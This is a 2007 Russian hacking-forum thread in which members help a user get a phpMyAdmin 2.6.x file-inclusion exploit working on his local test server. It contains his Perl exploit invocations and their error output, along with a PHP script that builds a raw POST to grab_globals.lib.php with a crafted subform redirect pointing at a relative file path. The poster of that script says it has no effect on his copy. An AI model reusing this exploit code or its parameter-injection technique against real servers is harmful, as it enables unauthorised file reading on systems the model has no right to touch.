Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Error in simple exploit phpMyAdmin |
12.12.2007, 03:12
|
|
Познающий
Регистрация: 08.01.2007
Сообщений: 59
Провел на форуме:
152485
Репутация:
44
|
|
Error in simple exploit phpMyAdmin
Здрасте!
Вот тут наткнулся на phpMyAdmin 2.6.1
Нашел сплойтик, для него
_http://securityvulns.ru/Jdocument894.html
Заюзал на локалхосте, но походу ручки то кривые.
Пишет.
ATTACK HOST IS: http://localhost
HTTP/1.1 400 Bad Request
Date: Tue, 11 Dec 2007 22:56:29 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.4
Content-Length: 226
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
</body></html> Запросы делал вида
C:\>perl\bin\perl.exe c:\php4.pl http://localhost /php/ www/htdocs/php/fuck.php
Предварительно создав fuck.php
Я наверно непрально пишу файл инклуда.
Подскажите как будет верно?
Последний раз редактировалось am@tory; 12.12.2007 в 03:15..
|
|
|
12.12.2007, 03:23
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756
Репутация:
2032
|
|
попробуй просто localhost . или для fuck.php может быть нужен параметр, в котором инклуд.
|
|
|
|
12.12.2007, 03:30
|
|
Познающий
Регистрация: 08.01.2007
Сообщений: 59
Провел на форуме:
152485
Репутация:
44
|
|
Сообщение от Piflit
попробуй просто localhost . или для fuck.php может быть нужен параметр, в котором инклуд.
ну если я прально понял, то просто localhost, не получится, а
fuck.php может быть нужен параметр, в котором инклуд
попробывал
C:\>perl\bin\perl.exe c:\php4.pl http://localhost /php/ www/htdocs/php/config.inc.php
тоже самое, наверно я непрально пишу путь к инклуду, пробывал
www/htdocs/php/config.inc.php
htdocs/php/config.inc.php
php/config.inc.php
config.inc.php
толка нет(
|
|
|
|
12.12.2007, 03:38
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
вобщем посмотрел я исходник, во первых убедись что phpmyadmin находится у тебя в папке php (не папка с phpmyadmin, а сам phpmyadmin)
во-вторых, имя файла который инклюдится (вернее там расчитано на то, что это читалка) должно иметь отнасительный путь, точно проверить не могу т.к. perl в денвере хреновый (без Sockets) сейчас попробую переделать под php если че отпишусь, если все получится
__________________
Карфаген должен быть разрушен...
|
|
|
|
12.12.2007, 03:40
|
|
Познающий
Регистрация: 08.01.2007
Сообщений: 59
Провел на форуме:
152485
Репутация:
44
|
|
Сообщение от Scipio
вобщем посмотрел я исходник, во первых убедись что phpmyadmin находится у тебя в папке php (не папка с phpmyadmin, а сам phpmyadmin)
во-вторых, имя файла который инклюдится (вернее там расчитано на то, что это читалка) должно иметь отнасительный путь, точно проверить не могу т.к. perl в денвере хреновый (без Sockets) сейчас попробую переделать под php если че отпишусь, если все получится
Спасибо огромное! Буду ждать. Что в папке php я уверен)
http://localhost/php/index.php
C:\www\htdocs\php
Может у меня криво настроенный апач? Оо
и по каким-то причинам ему не нравится POST?
Последний раз редактировалось am@tory; 12.12.2007 в 03:49..
|
|
|
|
12.12.2007, 03:51
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756
Репутация:
2032
|
|
Сообщение от am@tory
Буду ждать. Что в папке php я уверен)
а в версии пхпмайадмина ты уверен?
|
|
|
|
12.12.2007, 03:54
|
|
Познающий
Регистрация: 08.01.2007
Сообщений: 59
Провел на форуме:
152485
Репутация:
44
|
|
Сообщение от Piflit
а в версии пхпмайадмина ты уверен?
Да)
readme
Version 2.6.1-pl2
При входе
Добро пожаловать в phpMyAdmin 2.6.1-pl2
CHANGELOG
----------------------
phpMyAdmin - Changelog
----------------------
$Id: ChangeLog,v 2.871.2.24 2005/02/24 19:08:57 lem9 Exp $
$Source: /cvsroot/phpmyadmin/phpMyAdmin/ChangeLog,v $
2005-02-24 Marc Delisle <lem9@users.sourceforge.net>
### 2.6.1-pl2 released
2005-02-24 Alexander M. Turek <me@derrabus.de>
|
|
|
|
12.12.2007, 03:55
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756
Репутация:
2032
|
|
может дырка есть и в более старых версиях, а может и нет, я не знаю. но там указан 2.6.4
|
|
|
|
12.12.2007, 04:03
|
|
Познающий
Регистрация: 08.01.2007
Сообщений: 59
Провел на форуме:
152485
Репутация:
44
|
|
Сообщение от Piflit
может дырка есть и в более старых версиях, а может и нет, я не знаю. но там указан 2.6.4
думаю, что да, например здесь
http://securityvulns.ru/source/PHPMYADMIN.html
версии 2.6 объединены
|
|
|
|
12.12.2007, 04:17
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
посмотрел я код grab_globals.lib.php нет там ничего, такого, что б могло позволять читать или инклюдить файлы (там вобще практически ничего нет)
вот код на пхп, помоему правильно:
PHP код:
<?php
$host="localhost";
$fl="../Credits";
$dira="/Tools/phpmyadmin/";
$filo="usesubform[1]=1&usesubform[2]=1&subform[1][redirect]=".$fl."&subform[1][cXIb8O3]=1";
$leng=strlen($filo);
$qv="POST ".$dira."libraries/grab_globals.lib.php HTTP/1.0\nHost:".$host."\nContent-Type:application/x-www-form-urlencoded\nContent-Length:".$leng."\n\n";
$qv=$qv.$filo;
$fp = fsockopen ($host, 80);
fputs ($fp, $qv);
while (!feof($fp))
{
echo fgets($fp);
}
?>
$host - хост
$fl - файл для инклюда
$dira - папка с phpmyadmin
но этот сплоит у меня ничего не делает, т.к. еще раз говорю в grab_globals.lib.php ничего такого нет...
у меня phpMyAdmin 2.6.1
__________________
Карфаген должен быть разрушен...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
